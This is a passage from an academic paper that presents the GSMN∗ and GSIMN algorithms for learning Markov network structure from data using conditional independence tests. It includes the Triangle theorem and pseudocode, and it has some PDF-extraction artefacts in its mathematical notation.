Markov network is shown in Figure 1. Learning such models from data consists of two in- terdependent tasks: learning the structure of the network, and, given the learned structure, learning the parameters. In this work we focus on the problem of learning the structure of the MN of a domain from data. We present two algorithms for MN structure learning from data: GSMN∗ (Grow-Shrink Markov Network learning algorithm) and GSIMN (Grow-Shrink Inference-based Markov Network learning algorithm). The GSMN∗ algorithm is an adaptation to Markov networks of the GS algorithm by Margaritis and Thrun (2000), originally developed for learning the structure of Bayesian networks. GSMN∗ works by first learning the local neighborhood of each variable in the domain (also called the Markov blanket of the variable), and then using this information in subsequent steps to improve efficiency. Although interesting and useful in itself, we use GSMN∗ as a point of reference of the performance with regard to time complexity and accuracy achieved by GSIMN, which is the main result of this work. The GSIMN algorithm extends GSMN∗ by using Pearl’s theorems on the properties of the conditional independence relation (Pearl, 1988) to infer additional independences from a set of independences resulting from statistical tests and previous inferences, thus avoiding the execution of these tests on data. This allows savings in execution time and, when data are distributed, communication bandwidth. The rest of the paper is organized as follows: In the next section we present previous research related to the problem. Section 3 introduces notation, definitions and presents some intuition behind the two algorithms. Section 4 contains the main algorithms, GSMN∗ and GSIMN, as well as concepts and practical details related to their operation. We evaluate GSMN∗ and GSIMN and present our results in Section 5, followed by a summary of our 450 Efficient Markov Network Structure Discovery Using Independence Tests work and possible directions of future research in Section 6. Appendices A and B contain proofs of correctness of GSMN∗ and GSIMN. 2. Related Work Markov networks have been used in the physics and computer vision communities (Geman & Geman, 1984, Besag et al., 1991, Anguelov et al., 2005) where they have been historically called Markov random fields. Recently there has been interest in their use for spatial data mining, which has applications in geography, transportation, agriculture, climatology, ecology and others (Shekhar, Zhang, Huang, & Vatsavai, 2004). One broad and popular class of algorithms for learning the structure of graphical models is the score-based approach, exemplified for Markov networks by Della Pietra, Della Pietra, and Lafferty (1997), and McCallum (2003). Score-based approaches conduct a search in the space of legal structures in an attempt to discover a model structure of maximum score. Due to the intractable size of the search space i.e., the space of all legal graphs, which is super-exponential in size, score-based algorithms must usually resort to heuristic search. At each step of the structure search, a probabilistic inference step is necessary to evaluate the score (e.g., maximum likelihood, minimum description length, Lam & Bacchus, 1994, or pseudo-likelihood, Besag, 1974). For Bayesian networks this inference step is tractable and therefore several practical score-based algorithms for structure learning have been developed (Lam & Bacchus, 1994, Heckerman, 1995, Acid & de Campos, 2003). For Markov networks however, probabilistic inference requires the calculation of a normalizing constant (also known as partition function), a problem known to be NP-hard (Jerrum & Sinclair, 1993, Barahona, 1982). A number of approaches have considered a restricted class of graphical models (e.g. Chow & Liu, 1968, Rebane & Pearl, 1989, Srebro & Karger, 2001). However, Srebro and Karger (2001) prove that finding the maximum likelihood network is NP-hard for Markov networks of tree-width greater than 1. Some work in the area of structure learning of undirected graphical models has con- centrated on the learning of decomposable (also called chordal) MNs (Srebro & Karger, 2001). An example of learning non-decomposable MNs is presented in the work of Hof- mann and Tresp (1998), which is an approach for learning structure in continuous domains with non-linear relationships among the domain attributes. Their algorithm removes edges greedily based on a leave-one-out cross validation log-likelihood score. A non-score based approach is in the work of Abbeel, Koller, and Ng (2006), which introduces a new class of ef- ficient algorithms for structure and parameter learning of factor graphs, a class of graphical models that subsumes Markov and Bayesian networks. Their approach is based on a new parameterization of the Gibbs distribution in which the potential functions are forced to be probability distributions, and is supported by a generalization of the Hammersley-Clifford theorem for factor graphs. It is a promising and theoretically sound approach that may lead in the future to practical and efficient algorithms for undirected structure learning. In this work we present algorithms that belong to the independence-based or constraint- based approach (Spirtes, Glymour, & Scheines, 2000). Independence-based algorithms ex- ploit the fact that a graphical model implies that a set of independences exist in the distribu- tion of the domain, and therefore in the data set provided as input to the algorithm (under assumptions, see next section); they work by conducting a set of conditional independence 451 Bromberg, Margaritis, & Honavar tests on data, successively restricting the number of possible structures consistent with the results of those tests to a singleton (if possible), and inferring that structure as the only possible one. A desirable characteristic of independence-based approaches is the fact that they do not require the use of probabilistic inference during the discovery of the structure. Also, such algorithms are amenable to proofs of correctness (under assumptions). For Bayesian networks, the independence-based approach has been mainly exemplified by the SGS (Spirtes et al., 2000), PC (Spirtes et al., 2000), and algorithms that learn the Markov blanket as a step in learning the Bayesian network structure such as Grow-Shrink (GS) algorithm (Margaritis & Thrun, 2000), IAMB and its variants (Tsamardinos, Aliferis, & Statnikov, 2003a), HITON-PC and HITON-MB (Aliferis, Tsamardinos, & Statnikov, 2003), MMPC and MMMB (Tsamardinos, Aliferis, & Statnikov, 2003b), and max-min hill climbing (MMHC) (Tsamardinos, Brown, & Aliferis, 2006), all of which are widely used in the field. Algorithms for restricted classes such as trees (Chow & Liu, 1968) and polytrees (Rebane & Pearl, 1989) also exist. For learning Markov networks previous work has mainly focused on learning Gaussian graphical models, where the assumption of a continuous multivariate Gaussian distribution is made; this results in linear dependences among the variables with Gaussian noise (Whit- taker, 1990, Edwards, 2000). More recent approaches are included in the works of Dobra, Hans, Jones, Nevins, Yao, and West (2004), (Castelo & Roverato, 2006), Peña (2008), and Schäfer and Strimmer (2005), that focus on applications of Gaussian graphical models in Bioinformatics. While we do not make the assumption of continuous Gaussian variables in this paper, all algorithms we present are applicable to such domains with the use of an appropriate conditional independence test (such as partial correlation). The GSMN∗ and GSIMN algorithms presented apply to any case where an arbitrary faithful distribu- tion can be assumed and a probabilistic conditional independence test for that distribution is available. The algorithms were first introduced by Bromberg, Margaritis, and Honavar (2006); the contributions of the present paper include extending these results by conducting an extensive evaluation of their experimental and theoretical properties. More specifically, the contributions include an extensive and systematic experimental evaluation of the pro- posed algorithms on (a) data sets sampled from artificially generated networks of varying complexity and strength of dependences, as well as (b) data sets sampled from networks representing real-world domains, and (c) formal proofs of correctness that guarantee that the proposed algorithms will compute the correct Markov network structure of the domain, under the stated assumptions. 3. Notation and Preliminaries We denote random variables with capitals (e.g., X, Y, Z) and sets of variables with bold capitals (e.g., X, Y, Z). In particular, we denote by V = {0, . . . , n − 1} the set of all n variables in the domain. We name the variables by their indices in V; for instance, we refer to the third variable in V simply by 3. We denote the data set as D and its size (number of data points) by |D| or N . We use the notation (X⊥⊥Y | Z) to denote the proposition that X is independent of Y conditioned on Z, for disjoint sets of variables X, Y, and Z. (X 6⊥⊥Y | Z) denotes conditional dependence. We use (X⊥⊥Y | Z) as shorthand for ({X}⊥⊥{Y } | Z) to improve readability. 452 Efficient Markov Network Structure Discovery Using Independence Tests A Markov network is an undirected graphical model that represents the joint probability distribution over V. Each node in the graph represents one of the random variables in the domain, and absences of edges encode conditional independences among them. We assume the underlying probability distribution to be graph-isomorph (Pearl, 1988) or faithful (Spirtes et al., 2000), which means that it has a faithful undirected graph. A graph G is said to be faithful to some distribution if its graph connectivity represents exactly those dependencies and independences existent in the distribution. In detail, this means that that for all disjoint sets X, Y, Z ⊆ V, X is independent of Y given Z if and only if the set of vertices Z separates the set of vertices X from the set of vertices Y in the graph G (this is sometimes called the global Markov property, Lauritzen, 1996). In other words, this means that, after removing all vertices in Z from G (including all edges incident to each of them), there exists no (undirected) path in the remaining graph between any variable in X to some variable in Y. For example, in Figure 1, the set of variables {0, 5} separates set {4, 6} from set {2}. More generally, it has been shown (Pearl, 1988; Theorem 2, page 94 and definition of graph isomorphism, page 93) that a necessary and sufficient condition for a distribution to be graph-isomorph is for its set of independence relations to satisfy the following axioms for all disjoint sets of variables X, Y, Z, W and individual variable γ: (Symmetry) (X⊥⊥Y | Z) ⇐⇒ (Y⊥⊥X | Z) (Decomposition) (X⊥⊥Y ∪ W | Z) ⇐⇒ (X⊥⊥Y | Z) ∧ (X⊥⊥W | Z) (Intersection) (X⊥⊥Y | Z ∪ W) (1)∧ (X⊥⊥W | Z ∪ Y) =⇒ (X⊥⊥Y ∪ W | Z) (Strong Union) (X⊥⊥Y | Z) =⇒ (X⊥⊥Y | Z ∪ W) (Transitivity) (X⊥⊥Y | Z) =⇒ (X⊥⊥γ | Z) ∨ (γ⊥⊥Y | Z) For the operation of the algorithms we also assume the existence of an oracle that can answer statistical independence queries. These are standard assumptions that are needed for formally proving the correctness of independence-based structure learning algorithms (Spirtes et al., 2000). 3.1 Independence-Based Approach to Structure Learning GSMN∗ and GSIMN are independence-based algorithms for learning the structure of the Markov network of a domain. This approach works by evaluating a number of statistical independence statements, reducing the set of structures consistent with the results of these tests to a singleton (if possible), and inferring that structure as the only possible one. As mentioned above, in theory we assume the existence of an independence-query oracle that can provide information about conditional independences among the domain variables. This can be viewed as an instance of a statistical query oracle (Kearns & Vazirani, 1994). In practice such an oracle does not exist; however, it can be implemented approximately by a statistical test evaluated on the data set D. For example, for discrete data this can be Pearson’s conditional independence chi-square (χ2) test (Agresti, 2002), a mutual information test etc. For continuous Gaussian data a statistical test that can be used to measure conditional independence is partial correlation (Spirtes et al., 2000). To determine conditional independence between two variables X and Y given a set Z from data, the 453 Bromberg, Margaritis, & Honavar statistical test returns a p-value. The p-value of a test equals the probability of obtaining a value for the test statistic that is at least as extreme as the one that was actually observed given that the null hypothesis is true, which corresponds to conditional independence in our case. Assuming that the p-value of a test is p(X, Y | Z), the statistical test concludes dependence if and only if p(X, Y | Z) is less than or equal to a threshold α i.e., (X 6⊥⊥Y | Z) ⇐⇒ p(X, Y | Z) ≤ α. The quantity 1 − α is sometimes referred to as the test’s confidence threshold. We use the standard value of α = 0.05 in all our experiments, which corresponds to a confidence threshold of 95%. In a faithful domain, it can be shown (Pearl & Paz, 1985) that an edge exists between two variables X 6= Y ∈ V in the Markov network of that domain if an only if they are dependent conditioned on all remaining variables in the domain, i.e., (X, Y ) is an edge iff (X 6⊥⊥Y | V −{X, Y }). Thus, to learn the structure, theoretically it suffices to perform only n(n − 1)/2 tests i.e., one test (X, Y | V −{X, Y }) for each pair of variables X, Y ∈ V, X 6= Y . Unfortunately, in non-trivial domains this usually involves a test that conditions on a large number of variables. Large conditioning sets produce sparse contingency tables (count histograms) which result in unreliable tests. This is because the number of possible configurations of the variables grows exponentially with the size of the conditioning set—for example, there are 2n cells in a test involving n binary variables, and to fill such a table with one data point per cell we would need a data set of at least exponential size i.e., N ≥ 2n. Exacerbating this problem, more than one data point per cell is typically necessary for a reliable test: As recommended by Cochran (1954), if more than 20% of the cells of the contingency table have less than 5 data points the test is deemed unreliable. Therefore both GSMN∗ and GSIMN algorithms (presented below) attempt to minimize the conditioning set size; they do that by choosing an order of examining the variables such that irrelevant variables are examined last. 4. Algorithms and Related Concepts In this section we present our main algorithms, GSMN∗ and GSIMN, and supporting con- cepts required for their description. For the purpose of aiding the understanding of the reader, before discussing these we first describe the abstract GSMN algorithm in the next section. This helps in showing the intuition behind the algorithms and laying the foundation for them. 4.1 The Abstract GSMN Algorithm For the sake of clarity of exposition, before discussing our first algorithm GSMN∗, we describe the intuition behind it by describing its general structure using the abstract GSMN algorithm which deliberately leaves a number of details unspecified; these are filled-in in the concrete GSMN∗ algorithm, presented in the next section. Note that the choices for these 454 Efficient Markov Network Structure Discovery Using Independence Tests Algorithm 1 GSMN algorithm outline: G = GSMN (V, D). 1: Initialize G to the empty graph. 2: for all variables X in the domain V do 3: /* Learn the Markov Blanket BX of X using the GS algorithm. */ 4: BX ← GS (X, V, D) 5: Add an undirected edge in G between X and each variable Y ∈ BX . 6: return G Algorithm 2 GS algorithm. Returns the Markov Blanket BX of variable X ∈ V: BX = GS (X, V, D). 1: BX ← ∅ 2: /* Grow phase. */ 3: for each variable Y in V −{X} do 4: if (X 6⊥⊥Y | BX ) (estimated using data D) then 5: BX ← BX ∪{Y } 6: goto 3 /* Restart grow loop. */ 7: /* Shrink phase. */ 8: for each variable Y in BX do 9: if (X⊥⊥Y | BX −{Y }) (estimated using data D) then 10: BX ← BX −{Y } 11: goto 8 /* Restart shrink loop. */ 12: return BX details are a source of optimizations that can reduce the algorithm’s computational cost. We make these explicit when we discuss the concrete GSMN∗ and GSIMN algorithms. The abstract GSMN algorithm is shown in Algorithm 1. Given as input a data set D and a set of variables V, GSMN computes the set of nodes (variables) BX that are adjacent to each variable X ∈ V; these completely determine the structure of the domain MN. The algorithm consists of a main loop in which it learns the Markov blanket BX of each node (variable) X in the domain using the GS algorithm. It then constructs the Markov network structure by connecting X with each variable in BX . The GS algorithm was first proposed by Margaritis and Thrun (2000) and is shown in Algorithm 2. It consists of two phases, a grow phase and a shrink phase. The grow phase of X proceeds by attempting to add each variable Y to the current set of hypothesized neighbors of X, contained in BX , which is initially empty. BX grows by some variable Y during each iteration of the grow loop of X if and only if Y is found dependent with X given the current set of hypothesized neighbors BX . Due to the (unspecified) ordering that the variables are examined (this is explicitly specified in the concrete GSMN∗ algorithm, presented in the next section), at the end of the grow phase some of the variables in BX might not be true neighbors of X in the underlying MN—these are called false positives. This justifies the shrink phase of the algorithm, which removes each false positive Y in BX by testing for independence with X conditioned on BX −{Y }. If Y is found independent of X during the shrink phase, it cannot be a true neighbor (i.e., there cannot be an edge X−Y ), and GSMN removes it from BX . Assuming faithfulness and correctness of the independence query results, by the end of the shrink phase BX contains exactly the neighbors of X in the underlying Markov network. 455 Bromberg, Margaritis, & Honavar In the next section we present a concrete implementation of GSMN, called GSMN∗. This augments GSMN by specifying a concrete ordering that the variables X are examined in the main loop of GSMN (lines 2–5 in Algorithm 1), as well as a concrete order that the variables Y are examined in the grow and shrink phases of the GS algorithm (lines 3–6 and 8–11 in Algorithm 2, respectively). 4.2 The Concrete GSMN∗ Algorithm In this section we discuss our first algorithm, GSMN∗ (Grow-Shrink Markov Network learning algorithm), for learning the structure of the Markov network of a domain. Note that the reason for introducing GSMN∗ in addition to our main contribution, the GSIMN algorithm (presented later in Section 4.5), is for comparison reasons. In particular, GSIMN and GSMN∗ have identical structure, following the same order of examination of variables, with their only difference being the use of inference by GSIMN (see details in subsequent sections). Introducing GSMN∗ therefore makes it possible to measure precisely (through our experimental results in Section 5) the benefits of the use of inference on performance. The GSMN∗ algorithm is shown in Algorithm 3. Its structure is similar to the abstract GSMN algorithm. One notable difference is that the order that variables are examined is now specified; this is done in the initialization phase where the so-called examination order π and grow order λX of each variable X ∈ V is determined. π and all λX are priority queues and each is initially a permutation of V (λX is a permutation of V −{X}) such that the position of a variable in the queue denotes its priority e.g., π = [2, 0, 1] means that variable 2 has the highest priority (will be examined first), followed by 0 and finally by 1. Similarly, the position of a variable in λX determines the order it will be examined during the grow phase of X. During the initialization phase the algorithm computes the strength of unconditional dependence between each pair of variable X and Y , as given by the unconditional p-value p(X, Y | ∅) of an independence test between each pair of variables X 6= Y , denoted by pXY in the algorithm. (In practice the logarithm of the p-values is computed, which allows greater precision in domains where some dependencies may be very strong or very weak.) In particular, the algorithm gives higher priority to (examines earlier) those variables with a lower average log p-value (line 5), indicating stronger dependence. This average is defined as: avg Y log(pXY ) = 1 |V|− 1 ∑ Y 6=X log(pXY ). For the grow order λX of variable X, the algorithm gives higher priority to those variables Y whose p-value (or equivalently the log of the p-value) with variable X is small (line 8). This ordering is due to the intuition behind the “folk-theorem” (as Koller & Sahami, 1996, puts it) that states that probabilistic influence or association between attributes tends to attenuate over distance in a graphical model. This suggests that a pair of variables X and Y with high unconditional p-value are less likely to be directly linked. Note that this ordering is a heuristic and is not guaranteed to hold in general. For example, it may not hold if the underlying domain is a Bayesian network e.g., two “spouses” may be independent unconditionally but dependent conditional on a common child. Note however that this example does not apply to faithful domains i.e., graph-isomorph to a Markov network. Also 456 Efficient Markov Network Structure Discovery Using Independence Tests Algorithm 3 GSMN∗, a concrete implementation of GSMN: G = GSMN ∗(V, D). 1: Initialize G to the empty graph. 2: /* Initialization. */ 3: for all X, Y ∈ V, X 6= Y do 4: pXY ← p(X, Y | ∅) 5: Initialize π such that ∀i, i′ ∈{0, . . . , n − 1}, [ i < i′ ⇐⇒ avg j log(pπij ) < avg j log(pπi′ j ) ] . 6: for all X ∈ V do 7: BX ← ∅ 8: Initialize λX such that ∀j, j′ ∈{0, . . . , n − 1}, [ j < j′ ⇐⇒ pXλX j < pXλX j′ ] . 9: Remove X from λX . 10: /* Main loop. */ 11: while π is not empty do 12: X ← dequeue(π) 13: /* Propagation phase. */ 14: T ←{Y : Y was examined and X ∈ BY } 15: F ←{Y : Y was examined and X /∈ BY } 16: for all Y ∈ T, move Y to the end of λX . 17: for all Y ∈ F, move Y to the end of λX . 18: /* Grow phase. */ 19: S ← ∅ 20: while λX not empty do 21: Y ← dequeue(λX ) 22: if pXY ≤ α then 23: if ¬IGSMN∗ (X, Y, S, F, T) then 24: S ← S ∪{Y } 25: /* Change grow order of Y . */ 26: Move X to the beginning of λY . 27: for W = S|S|−2 to S0 do 28: Move W to the beginning of λY . 29: /* Change examination order. */ 30: for W = S|S|−1 to S0 do 31: if W ∈ π then 32: Move W to the beginning of π. 33: break to line 34 34: /* Shrink phase. */ 35: for Y = S|S|−1 to S0 do 36: if IGSMN∗ (X, Y, S −{Y } , F, T) then 37: S ← S −{Y } 38: BX ← S 39: Add an undirected edge in G between X and each variable Y ∈ BX . 40: return G note that the correctness of all algorithms we present does not depend on it holding i.e., as we prove in Appendices A and B, both GSMN∗ and GSIMN are guaranteed to return the correct structure under the assumptions stated in Section 3 above. Also note that the computational cost for the calculation of pXY is low due to the empty conditioning set. The remaining of the GSMN∗ algorithm contains the main loop (lines 10–39) in which each variable in V is examined according to the examination order π, determined during 457 Bromberg, Margaritis, & Honavar Algorithm 4 IGSMN∗ (X, Y, S, F, T): Calculate independence test (X, Y | S) by propaga- tion, if possible, otherwise run a statistical test on data. 1: /* Attempt to infer dependence by propagation. */ 2: if Y ∈ T then 3: return false 4: /* Attempt to infer independence by propagation. */ 5: if Y ∈ F then 6: return true 7: /* Else do statistical test on data. */ 8: t ← 1(p(X,Y |Z)>α) /* t = true iff p-value of statistical test (X, Y | S) > α. */ 9: return t the initialization phase. The main loop includes three phases: the propagation phase (lines 13–17), the grow phase (lines 18–33), and the shrink phase (lines 34–37). The propagation phase is an optimization in which all variables Y for which BY has already been computed (i.e., all variables Y already examined) are collected in two sets F and T. Set F (T) contains all variables Y such that X /∈ BY (X ∈ BY ). Both sets are passed to the independence procedure IGSMN∗ , shown in Algorithm 4, for the purpose of avoiding the execution of any tests between X and Y by the algorithm. This is justified by the fact that, in undirected graphs, Y is in the Markov blanket of X if and only if X is in the Markov blanket of Y . Variables Y already found not to contain X in their blanket BY (set F) cannot be members of BX because there exists some set of variables that has rendered them conditionally independent of X in a previous step, and independence can therefore be inferred easily. Note that in the experiments section of the paper (Section 5) we evaluate GSMN∗ with and without the propagation phase, in order to measure the effect that this propagation optimization has on performance. Turning off propagation is accomplished simply by setting sets T and F (as computed in lines 14 and 15, respectively) to the empty set. Another difference of GSMN∗ from the abstract GSMN algorithm is in the use of condi- tion pXY ≤ α (line 22). This is an additional optimization that avoids an independence test in the case that X and Y were found (unconditionally) independent during the initialization phase, since in that case this would imply X and Y are independent given any conditioning set by the axiom of Strong Union. A crucial difference between GSMN∗ and the abstract GSMN algorithm is that GSMN∗ changes the examination order π and the grow order λY of every variable Y ∈ λX . (Since X /∈ λX , this excludes the grow order of X itself.) These changes in ordering proceed as follows: After the end of the grow phase of variable X, the new examination order π (set in lines 30–33) dictates that the next variable W to be examined after X is the last to be added to S during the growing phase that has not yet been examined (i.e., W is still in π). The grow order λY of all variables Y found dependent with X is also changed; this is done to maximize the number of optimizations by the GSIMN algorithm (our main contribution in this paper) which shares the algorithm structure of GSMN∗. The changes in grow order are therefore explained in detail in Section 4.5 when GSIMN is presented. A final difference between GSMN∗ and the abstract GSMN algorithm is the restart actions of the grow and shrink phases of GSMN whenever the current Markov blanket is modified (lines 6 and 11 of Algorithm 2), which are not present in GSMN∗. The restarting 458 Efficient Markov Network Structure Discovery Using Independence Tests Figure 2: Illustration of the operation of GSMN∗ using an independence graph. The figure shows the growing phase of variable 5. Variables are examined according to its grow order λ5 = [3, 4, 1, 6, 2, 7, 0]. of the loops was necessary in the GS algorithm due to its original usage in learning the structure of Bayesian networks. In that task, it was possible for a true member Y of the blanket of X to be found initially independent during the grow loop when conditioning on some set S but to be found dependent later when conditioned on a superset S′ ⊃ S. This could happen if Y was an “unshielded spouse” of X i.e., if Y had one or more common children with X but there existed no direct link between Y and X in the underlying Bayesian network. However, this behavior is impossible in a domain that has a distribution faithful to a Markov network (one of our assumptions): any independence between X and Y given S must hold for any superset S′ of S by the axiom of Strong Union (see Eqs. (1)). The restart of the grow and shrink loops is therefore omitted from GSMN∗ in order to save unnecessary tests. Note that, even though it is possible that this behavior is impossible in faithful domains, it is possible in unfaithful ones, so we also experimentally evaluated our algorithms in real-world domains in which the assumption of Markov faithfulness may not necessarily hold (Section 5). A proof of correctness of GSMN∗ is presented in Appendix A. 4.3 Independence Graphs We can demonstrate the operation of GSMN∗ graphically by the concept of the independence graph, which we now introduce. We define an independence graph to be an undirected graph in which conditional independences and dependencies between single variables are represented by one or more annotated edges between them. A solid (dotted) edge between variables X and Y annotated by Z represents the fact that X and Y have been found dependent (independent) given Z. If the conditioning set Z is enclosed in parentheses then this edge represents an independence or dependence that was inferred from Eqs. (1) (as opposed to computed from statistical tests). Shown graphically: 459 Bromberg, Margaritis, & Honavar X Y Z (X 6⊥⊥Y | Z) X Y Z (X⊥⊥Y | Z) X Y (Z) (X 6⊥⊥Y | Z) (inferred) X Y (Z) (X⊥⊥Y | Z) (inferred) For instance, in Figure 2, the dotted edge between 5 and 1 annotated with “3, 4” represents the fact that (5⊥⊥1 | {3, 4}). The absence of an edge between two variables indicates the absence of information about the independence or dependence between these variables under any conditioning set. Example 1. Figure 2 illustrates the operation of GSMN∗ using an independence graph in the domain whose underlying Markov network is shown in Figure 1. The figure shows the independence graph at the end of the grow phase of the variable 5, the first in the examination order π. (We do not discuss in this example the initialization phase of GSMN∗; instead, we assume that the examination (π) and grow (λ) orders are as shown in the figure.) According to vertex separation on the underlying network (Figure 1), variables 3, 4, 6, and 7 are found dependent with 5 during the growing phase i.e., ¬I(5, 3 | ∅), ¬I(5, 4 | {3}), ¬I(5, 6 | {3, 4}), ¬I(5, 7 | {3, 4, 6}) and are therefore connected to 5 in the independence graph by solid edges annotated by sets ∅, {3}, {3, 4} and {3, 4, 6} respectively. Variables 1, 2, and 0 are found independent i.e., I(5, 1 | {3, 4}), I(5, 2 | {3, 4, 6}), I(5, 0 | {3, 4, 6, 7}) and are thus connected to 5 by dotted edges annotated by {3, 4}, {3, 4, 6} and {3, 4, 6, 7} respectively. 4.4 The Triangle Theorem In this section we present and prove a theorem that is used in the subsequent GSIMN algorithm. As will be seen, the main idea behind the GSIMN algorithm is to attempt to de- crease the number of tests done by exploiting the properties of the conditional independence relation in faithful domains i.e., Eqs. (1). These properties can be seen as inference rules that can be used to derive new independences from ones that we know to be true. A careful study of these axioms suggests that only two simple inference rules, stated in the Triangle theorem below, are sufficient for inferring most of the useful independence information that can be inferred by a systematic application of the inference rules. This is confirmed in our experiments in Section 5. 460 Efficient Markov Network Structure Discovery Using Independence Tests Figure 3: Independence graph depicting the Triangle theorem. Edges in the graph are labeled by sets and represent conditional independences or dependencies. A solid (dotted) edge between X and Y labeled by Z means that X and Y are dependent (independent) given Z. A set label enclosed in parentheses means the edge was inferred by the theorem. Theorem 1 (Triangle theorem). Given Eqs. (1), for every variable X, Y , W and sets Z1 and Z2 such that {X, Y, W}∩ Z1 = {X, Y, W}∩ Z2 = ∅, (X 6⊥⊥W | Z1) ∧ (W 6⊥⊥Y | Z2) =⇒ (X 6⊥⊥Y | Z1 ∩ Z2) (X⊥⊥W | Z1) ∧ (W 6⊥⊥Y | Z1 ∪ Z2) =⇒ (X⊥⊥Y | Z1). We call the first relation the “D-triangle rule” and the second the “I-triangle rule.” Proof. We are using the Strong Union and Transitivity of Eqs. (1) as shown or in contra- positive form. (Proof of D-triangle rule): • From Strong Union and (X 6⊥⊥W | Z1) we get (X 6⊥⊥W | Z1 ∩ Z2). • From Strong Union and (W 6⊥⊥Y | Z1) we get (W 6⊥⊥Y | Z1 ∩ Z2). • From Transitivity, (X 6⊥⊥W | Z1∩Z2), and (W 6⊥⊥Y | Z1∩Z2), we get (X 6⊥⊥Y | Z1∩Z2). (Proof of I-triangle rule): • From Strong Union and (W 6⊥⊥Y | Z1 ∪ Z2) we get (W 6⊥⊥Y | Z1). • From Transitivity, (X⊥⊥W | Z1) and (W 6⊥⊥Y | Z1) we get (X⊥⊥Y | Z1). We can represent the Triangle theorem graphically using the independence graph con- struct of Section 4.2. Figure 3 depicts the two rules of the Triangle theorem using two independence graphs. The Triangle theorem can be used to infer additional conditional independences from tests conducted during the operation of GSMN∗. An example of this is shown in Fig- ure 4, which illustrates the application of the Triangle theorem to the example presented in Figure 2. The independence information inferred from the Triangle theorem is shown by curved edges (note that the conditioning set of each such edge is enclosed in parentheses). 461 Bromberg, Margaritis, & Honavar Figure 4: Illustration of the use of the Triangle theorem on the example of Figure 2. The set of variables enclosed in parentheses correspond to tests inferred by the Triangle theorem using the two adjacent edges as antecedents. For example, the result (1⊥⊥7 | {3, 4}), is inferred from the I-triangle rule, independence (5⊥⊥1 | {3, 4}) and dependence (5 6⊥⊥7 | {3, 4, 6}). For example, independence edge (4, 7) can be inferred by the D-triangle rule from the ad- jacent edges (5, 4) and (5, 7), annotated by {3} and {3, 4, 6} respectively. The annotation for this inferred edge is {3}, which is the intersection of the annotations {3} and {3, 4, 6}. An example application of the I-triangle rule is edge (1, 7), which is inferred from edges (5, 1) and (5, 7) with annotations {3, 4} and {3, 4, 6} respectively. The annotation for this inferred edge is {3, 4}, which is the intersection of the annotations {3, 4, 6} and {3, 4}. 4.5 The GSIMN Algorithm In the previous section we saw the possibility of using the two rules of the Triangle theorem to infer the result of novel tests during the grow phase. The GSIMN algorithm (Grow-Shrink Inference-based Markov Network learning algorithm), introduced in this sec- tion, uses the Triangle theorem in a similar fashion to extend GSMN∗ by inferring the value of a number of tests that GSMN∗ executes, making their evaluation unnecessary. GSIMN and GSMN∗ work in exactly the same way (and thus the GSIMN algorithm shares exactly the same algorithmic description i.e., both follow Algorithm 3), with all differences between them concentrated in the independence procedure they use: instead of using independence procedure IGSMN∗ of GSMN ∗, GSIMN uses procedure IGSIMN, shown in Algorithm 5. Pro- cedure IGSIMN, in addition to attempting to propagate the blanket information obtained from the examination of previous variables (as IGSMN∗ does), also attempts to infer the value of the independence test that is provided as its input by either the Strong Union axiom (listed in Eqs. (1)) or the Triangle theorem. If this attempt is successful, IGSIMN returns the value inferred (true or false), otherwise it defaults to a statistical test on the data set (as IGSMN∗ does). For the purpose of assisting in the inference process, GSIMN and 462 Efficient Markov Network Structure Discovery Using Independence Tests Algorithm 5 IGSIMN(X, Y, S, F, T): Calculate independence test result by inference (in- cluding propagation), if possible. Record test result in the knowledge base. 1: /* Attempt to infer dependence by propagation. */ 2: if Y ∈ T then 3: return false 4: /* Attempt to infer independence by propagation. */ 5: if Y ∈ F then 6: return true 7: /* Attempt to infer dependence by Strong Union. */ 8: if ∃(A, false) ∈ KXY such that A ⊇ S then 9: return false 10: /* Attempt to infer dependence by the D-triangle rule. */ 11: for all W ∈ S do 12: if ∃(A, false) ∈ KXW such that A ⊇ S ∧ ∃(B, false) ∈ KW Y such that B ⊇ S then 13: Add (A ∩ B, false) to KXY and KY X . 14: return false 15: /* Attempt to infer independence by Strong Union. */ 16: if ∃(A, true) ∈ KXY such that A ⊆ S then 17: return true 18: /* Attempt to infer independence by the I-triangle rule. */ 19: for all W ∈ S do 20: if ∃(A, true) ∈ KXW s.t. A ⊆ S ∧ ∃(B, false) ∈ KW Y s.t. B ⊇ A then 21: Add (A, true) to KXY and KY X . 22: return true 23: /* Else do statistical test on data. */ 24: t ← 1(p(X,Y |Z)>α) /* t = true iff p-value of statistical test (X, Y | S) > α. */ 25: Add (S, t) to KXY and KY X . 26: return t IGSIMN maintain a knowledge base KXY for each pair of variables X and Y , containing the outcomes of all tests evaluated so far between X and Y (either from data or inferred). Each of these knowledge bases is empty at the beginning of the GSIMN algorithm (the initializa- tion step is not shown in the algorithm since GSMN∗ does not use it), and is maintained within the test procedure IGSIMN. We now explain IGSIMN (Algorithm 5) in detail. IGSIMN attempts to infer the in- dependence value of its input triplet (X, Y | S) by applying a single step of backward chaining using the Strong Union and Triangle rules i.e., it searches the knowledge base K = {KXY : X, Y ∈ V} for antecedents of instances of rules that have the input triplet (X, Y | S) as consequent. The Strong Union rule is used in its direct from as shown in Eqs. (1) and also in its contrapositive form. The direct form can be used to infer indepen- dences, and therefore we refer to it as the I-SU rule from here on. In its contrapositive form, the I-SU rule becomes (X 6⊥⊥Y | S ∪ W) =⇒ (X 6⊥⊥Y | S), referred to as the D-SU rule since it can be used to infer dependencies. According to the D-Triangle and D-SU rules, the dependence (X 6⊥⊥Y | S) can be inferred if the knowledge base K contains 1. a test (X 6⊥⊥Y | A) with A ⊇ S, or 2. tests (X 6⊥⊥W | A) and (W 6⊥⊥Y | B) for some variable W , with A ⊇ S and B ⊇ S, 463 Bromberg, Margaritis, & Honavar Figure 5: Illustration of the operation of GSIMN. The figure shows the grow phase of two consecutively examined variables 5 and 7. The figure shows how the variable examined second is not 3 but 7, according to the change in the examination order π in lines 30–33 of Algorithm 3. The set of variables enclosed in parentheses correspond to tests inferred by the Triangle theorem using two adjacent edges as antecedents. The results (7 6⊥⊥3 | ∅), (7 6⊥⊥4 | {3}), (7 6⊥⊥6 | {3, 4}), and (7 6⊥⊥5 | {3, 4, 6}) in (b), shown highlighted, were not executed but inferred from the tests done in (a). respectively. According to the I-Triangle and I-SU rules, the independence (X⊥⊥Y | S) can be inferred if the knowledge base contains 3. a test (X⊥⊥Y | A) with A ⊆ S, or 4. tests (X⊥⊥W | A) and (W 6⊥⊥Y | B) for some variable W , with A ⊆ S and B ⊇ A, respectively. The changes to the grow orders of some variables occur inside the grow phase of the currently examined variable X (lines 25–28 of GSIMN i.e., Algorithm 3 with IGSMN∗ re- placed by 